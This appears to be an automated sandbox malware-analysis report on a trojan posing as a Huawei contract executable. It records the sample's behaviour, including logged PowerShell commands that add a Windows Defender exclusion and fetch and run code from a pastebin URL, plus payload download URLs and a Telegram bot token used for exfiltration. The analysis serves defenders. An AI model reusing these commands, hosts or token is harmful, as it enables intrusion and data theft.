Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmp
Source: [Huawei] Contract for YouTube partners.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: [Huawei] Contract for YouTube partners.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: [Huawei] Contract for YouTube partners.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: [Huawei] Contract for YouTube partners.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: [Huawei] Contract for YouTube partners.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline"
Source: [Huawei] Contract for YouTube partners.exe | Static PE information: section name: .CLR_UEF
Source: [Huawei] Contract for YouTube partners.exe | Static PE information: section name: .didat
Source: [Huawei] Contract for YouTube partners.exe | Static PE information: section name: Section
Source: [Huawei] Contract for YouTube partners.exe | Static PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3444D2A5 pushad ; iretd 2_2_00007FFD3444D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD345600BD pushad ; iretd 2_2_00007FFD345600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD345300BD pushad ; iretd 4_2_00007FFD345300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD34530108 push ds; retf 4_2_00007FFD345301B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD3453018D push ds; retf 4_2_00007FFD345301B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD34530347 push esi; retf 4_2_00007FFD34530376
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD34530327 pushad ; retf 4_2_00007FFD34530346
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.dll

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe | Memory allocated: 2774F970000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe | Window / User API: threadDelayed 3499
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe | Window / User API: threadDelayed 617
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7534
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2176
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6697
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3089
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7099
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2414
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe TID: 6736 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576 | Thread sleep count: 7534 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3420 | Thread sleep count: 2176 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2948 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264 | Thread sleep count: 6697 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128 | Thread sleep count: 3089 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1268 | Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7036 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544 | Thread sleep count: 7099 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6548 | Thread sleep count: 2414 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016 | Thread sleep time: -5534023222112862s >= -30000s
Source: powershell.exe, 00000004.00000002.2275873193.0000022474120000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000003.2980179958.000002B7E6F8C000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3129220728.000002B7E6F8C000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.2466122737.000002B7E6F3D000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.2678831163.000002B7E6F7D000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.2981312025.000002B7E6F8C000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.2466637902.000002B7E6F7D000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247768363.000002B7E6F86000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FFD9A863843
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD333.tmp" "c:\Users\user\AppData\Local\Temp\jwryu2yd\CSC4A1A778723A0488D9C81AB4CE7B7E2B.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244168674.000002774F737000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
MITRE ATT&CK Matrix (one line per tactic, techniques in the report's row order; a number in front of a technique name is the report's signature-count badge for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 21 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 2 Web Service; 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID: 1617339). Sample: [Huawei] Contract for YouTube partners.exe. Start date: 17/02/2025. Architecture: WINDOWS. Score: 100.

Start node
  DNS/IP: pastebin.com; api.telegram.org; 2 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures
  Signatures on network nodes: Connects to a pastebin service (likely for C&C) (pastebin.com); Uses the Telegram API (likely for C&C communication) (api.telegram.org)

[Huawei] Contract for YouTube partners.exe (12) started
  DNS/IP: ip-api.com 208.95.112.1, 49785, 80, TUT-ASUS, United States; api.telegram.org 149.154.167.220, 443, 49792, 50001, TELEGRAMRU, United Kingdom; 2 other IPs or domains
  Signature: Adds a directory exclusion to Windows Defender
  Started: powershell.exe (14 24); powershell.exe (23); powershell.exe

powershell.exe (14 24) started
  DNS/IP: pastebin.com 172.67.19.24, 443, 49706, CLOUDFLARENETUS, United States
  Dropped file: C:\Users\user\AppData\...\jwryu2yd.cmdline (Unicode)
  Signature: Writes to foreign memory regions
  Started: csc.exe (3); conhost.exe

powershell.exe (23) started
  Signature: Loading BitLocker PowerShell Module
  Started: conhost.exe

powershell.exe started
  Started: conhost.exe

csc.exe (3) started
  Dropped file: C:\Users\user\AppData\Local\...\jwryu2yd.dll (PE32)
  Started: cvtres.exe (1)

Source | Detection | Scanner | Label
[Huawei] Contract for YouTube partners.exe | 24% | ReversingLabs | Win64.Trojan.Nekark
[Huawei] Contract for YouTube partners.exe | 11% | Virustotal |
No Antivirus matches
Source | Detection | Scanner | Label
http://ns.adobe.c.0/ti | 0% | Avira URL Cloud | safe
http://89.23.97.214/Team/BILLI.exe | 0% | Avira URL Cloud | safe
http://89.23.97.214:80/ | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/SystemV | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer | 0% | Avira URL Cloud | safe
http://89.23.97.214/Team/32cv.exe: | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/System.Xml | 0% | Avira URL Cloud | safe
http://89.23.97.214/Team/BILLI.exehttp://89.23.97.214/Team/32cv.exe | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/System.Runtime.Serialization | 0% | Avira URL Cloud | safe
http://89.23.97.214/Team/32cv.exe | 100% | Avira URL Cloud | malware
http://89.23.97.214/Team/BILLI.exe: | 0% | Avira URL Cloud | safe
http://api.ipify.orgx | 0% | Avira URL Cloud | safe
http://api.ipify.orgnotification_sent.flag | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/System.Xml.Linq | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/System.IO | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/SystemY | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.12.205 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
pastebin.com | 172.67.19.24 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessage | false | | high
https://api.telegram.org/bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendPhoto?chat_id=-4642404996 | false | | high
https://pastebin.com/raw/WHKzW2nr | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.datacontract.org/2004/07/SystemV | [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://html4/loose.dtd | [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmp | false | | high
http://ns.adobe.hotosh | [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005 | [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://ns.adobe.c.0/ti | [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://89.23.97.214/Team/BILLI.exe | [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ns.photo/ | [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ns.a.0/sTy | [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.datacontract.org | [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754043000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://go.microsoft.co | powershell.exe, 00000009.00000002.2446866312.0000020D2068A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200 | [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://aka.ms/dotnet/info | [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmp | false | | high
https://aka.ms/winforms-warnings/ | [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA5E6000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://89.23.97.214/Team/BILLI.exehttp://89.23.97.214/Team/32cv.exe | [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.co | powershell.exe, 00000002.00000002.2247608619.0000016DD6CFB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2450396016.0000020D20A67000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                      https://contoso.com/Licensepowershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://aka.ms/dotnet/app-launch-failed[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                                          high
                                          http://schemas.datacontract.org/2004/07/System.Xml[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                            high
                                            http://.css[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                high
                                                https://aka.ms/dotnet-core-applaunch?[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/dotnet/runtime[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245966712.00000277513E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249567499.000002B7E95B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249010025.000002B7E9301000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251410435.000002B7EA1B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248897242.000002B7E9280000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249747447.000002B7E9640000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245924097.00000277513D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248833493.000002B7E91C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245331226.0000027751290000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249503089.000002B7E9590000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 
00000000.00000002.3248611872.000002B7E90A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247337256.000002B7E6560000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250591766.000002B7E9D51000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251506804.000002B7EA1F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249194705.000002B7E9380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244925040.000002774F991000.00000020.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      http://api.telegram.org:443/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540B9000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754067000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        high
                                                        https://api.telegram.org/bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendPhoto?chat_id=-464240[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754067000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          http://ip-api.com:80/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754043000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
